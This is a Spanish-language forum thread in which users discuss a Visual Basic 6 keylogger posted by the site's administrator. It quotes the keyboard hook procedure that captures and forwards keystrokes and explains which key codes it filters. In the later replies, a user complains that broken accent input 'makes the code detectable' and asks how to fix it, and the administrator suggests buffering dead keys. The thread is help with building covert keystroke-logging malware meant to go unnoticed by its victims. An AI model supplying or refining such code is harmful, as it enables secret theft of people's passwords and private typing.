Autor Tema: Preguntas sobre el keylogger  (Leído 3361 veces)

raul338

• Terabyte
  • xD fan!!!!! xD
    • Ver Perfil
    • Raul's Weblog
Preguntas sobre el keylogger
« en: Abril 20, 2010, 10:10:55 am »
Hola Leandro

Estaba observando tu gran codigo del keylogger, que funciona bien y esta bueno, pero.....leyendolo me encontre con algo que no entendi y no encontre nada en internet :-\

Código: (vb) [Seleccionar]
Private Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
    On Error Resume Next

Select Case wParam

Case WM_KEYDOWN
            If lParam <> 222 And lParam <> 186 And lParam <> 162 And lParam <> 20 Then
                Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)
            End If

Case WM_SYSKEYDOWN
            If lParam = 162 Or lParam = 165 Or lParam = 50 Then
                Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)
            End If

End Select

End Function

Mi unica pregunta hasta ahora es porque lParam no pueden ser esos numeros, que significan esos numeros? segun msdn el lParam es un puntero a una estructura, entonces como lo puede tomar como numero? jeje... no entendi nada de eso.... podrias explicarlo? (o dar algunas referencias para leer?)

LeandroA

• Administrador
  • Petabyte
    • Ver Perfil
Re:Preguntas sobre el keylogger
« Respuesta #1 en: Abril 20, 2010, 04:10:30 pm »
hola son algunas teclas que si las paso se las bloquea al usuario por ejemplo el acento.

WM_KEYDOWN
222 = ´
186 = `
162 = Ctrl
22 = no me acuerdo ???

WM_SYSKEYDOWN
162 = Ctrl
165 =Alg Gr
50 = @

creo que hay algunos mas que deberia filtrar pero bueno es para zafar.

Saludos

CostanzaDC

• Bit
    • Ver Perfil
« Respuesta #2 en: Julio 07, 2015, 07:41:38 pm »
Hola!  concuerdo,  gran keylogger  :)

justo tengo problemas con los acentos,
el usuario espera ver "acción"     pero ve  "accion"   y eso hace el codigo detectable

logre atinarle ?  a que el 186 o 222 es cuando el usuario presiona el acento, con alguna vocal,
le puse:
   If WM_KEYDOWN = 186 , 222 then
         do events 
         exit function
   endif

y, aunque eso funciona al momento que tengo el visual basic 6 abierto y ejecutandose,
es decir,   si se escriben los acentos, en el bloc de notas ( donde estoy probando )
cuando hago el ejecutable y lo pongo a funcionar,  otra vez  no se escriben los acentos,
solamente aparece la vocal,   

por favor, podrias indicarnos como, o modificar el codigo, para que acepte acentos?

« última modificación: Julio 07, 2015, 07:52:02 pm por CostanzaDC »

LeandroA

• Administrador
  • Petabyte
    • Ver Perfil
« Respuesta #3 en: Julio 08, 2015, 02:55:48 am »
hola, mira había intentado solucionar eso, y lo solucione en partes y porque digo en partes, en el block de notas si funcionaba pero no en una planilla de word, al parecer trabajan distintos con el block de notas cuando encontraba el acento  lo almacenaba en una variable, luego y no enviaba el msg, luego cuando entraba otra letra envia el acento y la letra, con eso se soluciona para el block de notas, pero "creo" almenos no indague mucho en la planilla de word no envia el acento sino mas bien creo que ya envia el caracter ya armado es decir en vez de enviar ( ´ a ) envia  el caracter 160 asi que lo que se debería hacer es filtrar esos caracteres o almacenarlos en un bufer y luegos enviar el msg a la ventana edit.